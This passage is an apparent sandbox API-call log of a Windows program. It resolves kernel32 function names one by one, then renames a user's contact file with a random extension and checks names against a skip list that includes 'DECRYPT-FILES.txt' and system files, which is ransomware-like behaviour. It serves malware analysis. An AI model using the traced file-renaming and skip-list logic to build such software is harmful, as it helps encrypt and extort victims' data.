returned 12 [0082.683] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0082.683] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0082.683] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0082.683] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0082.683] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0082.683] lstrlenA (lpString="CREATEEVENTW") returned 12 [0082.683] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0082.683] lstrlenA (lpString="CREATEFIBER") returned 11 [0082.683] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0082.683] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0082.683] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0082.683] lstrlenA (lpString="CREATEFILEA") returned 11 [0082.683] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0082.683] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0082.683] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0082.683] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0082.683] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0082.683] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0082.684] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0082.684] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0082.684] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0082.684] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0082.684] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0082.684] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0082.684] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0082.684] lstrlenA (lpString="CREATEFILEW") returned 11 [0082.684] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0082.684] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0082.684] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0082.684] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0082.684] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0082.684] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0082.684] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0082.684] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0082.684] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0082.684] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0082.684] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0082.684] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0082.684] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0082.684] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0082.684] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0082.684] lstrlenA (lpString="CREATEJOBSET") returned 12 [0082.684] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0082.684] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0082.684] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0082.684] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0082.684] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0082.684] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0082.684] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0082.684] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0082.684] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0082.684] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0082.684] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0082.685] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0082.685] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0082.685] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0082.685] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0082.685] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0082.685] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0082.685] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0082.685] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0082.685] lstrlenA (lpString="CREATEPIPE") returned 10 [0082.685] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0082.685] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0082.685] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0082.685] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0082.685] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0082.685] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0082.685] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0082.685] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0082.685] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0082.685] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0082.685] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0082.685] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0082.685] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0082.685] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0082.685] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0082.685] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0082.685] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0082.685] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0082.685] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0082.685] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0082.685] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0082.685] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0082.685] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0082.685] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0082.685] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0082.685] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0082.686] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0082.686] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0082.686] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0082.686] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0082.686] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0082.686] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0082.686] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0082.686] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0082.686] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0082.686] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0082.686] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0082.686] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0082.686] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0082.686] lstrlenA (lpString="CREATETHREAD") returned 12 [0082.686] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0082.686] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0082.686] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0082.686] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0082.686] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0082.686] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0082.686] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0082.686] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0082.686] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0082.686] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0082.686] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0082.686] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0082.686] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0082.686] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0082.686] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0082.686] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0082.686] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0082.686] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0082.686] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0082.686] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0082.686] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0082.686] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0082.686] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0082.687] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0082.687] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0082.687] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0082.687] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0082.687] lstrlenA (lpString="CTRLROUTINE") returned 11 [0082.687] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0082.687] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0082.687] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0082.687] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0082.687] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0082.687] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0082.687] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0082.687] lstrlenA (lpString="DEBUGBREAK") returned 10 [0082.687] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0082.687] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0082.687] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0082.687] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0082.687] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0082.687] lstrlenA (lpString="DECODEPOINTER") returned 13 [0082.687] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0082.687] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0082.687] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0082.687] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0082.687] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0082.687] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0082.687] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0082.687] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0082.687] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0082.687] lstrlenA (lpString="DELETEATOM") returned 10 [0082.687] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0082.687] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0082.687] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0082.687] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0082.687] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0082.687] lstrlenA (lpString="DELETEFIBER") returned 11 [0082.687] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0082.687] lstrlenA (lpString="DELETEFILEA") returned 11 [0082.688] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0082.688] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0082.688] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0082.688] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0082.688] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0082.688] lstrlenA (lpString="DELETEFILEW") returned 11 [0082.688] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0082.688] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0082.688] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0082.688] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0082.688] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0082.688] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0082.688] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0082.688] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0082.688] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0082.688] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0082.688] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0082.688] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0082.688] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0082.688] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0082.688] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0082.688] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0082.688] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0082.688] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0082.688] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0082.688] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0082.688] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0082.688] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0082.688] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0082.688] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0082.688] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0082.688] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0082.688] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0082.688] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0082.688] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0082.689] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0082.689] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0082.689] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0082.689] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0082.689] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0082.689] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0082.689] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0082.689] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0082.689] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0082.689] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0082.689] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0082.689] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0082.689] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0082.689] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0082.689] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0082.689] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0082.689] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0082.689] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0082.689] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0082.689] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0082.689] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0082.689] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0082.689] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0082.689] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0082.689] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0082.689] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0082.689] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0082.689] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0082.689] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0082.689] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0082.689] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0082.689] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0082.689] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0082.689] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0082.689] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0082.689] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0082.690] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0082.690] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0082.690] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0082.690] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact") returned 62 [0082.690] wsprintfW (in: param_1=0x3f2e120, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact.vGsKl8") returned 69 [0082.690] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\aclviho asldjfl.contact"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact.vGsKl8" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\aclviho asldjfl.contact.vgskl8"), dwFlags=0x0) returned 1 [0082.690] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.691] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.691] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.691] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf0fefd94, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x10b1e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Administrator.contact", cAlternateFileName="ADMINI~1.CON")) returned 1 [0082.691] lstrcmpiW (lpString1="Administrator.contact", lpString2="DECRYPT-FILES.txt") returned -1 [0082.691] lstrcmpiW (lpString1="Administrator.contact", lpString2="autorun.inf") returned -1 [0082.691] lstrcmpiW (lpString1="Administrator.contact", lpString2="boot.ini") returned -1 [0082.691] lstrcmpiW (lpString1="Administrator.contact", lpString2="desktop.ini") returned -1 [0082.691] lstrcmpiW (lpString1="Administrator.contact", lpString2="ntuser.dat") returned -1 [0082.691] lstrcmpiW 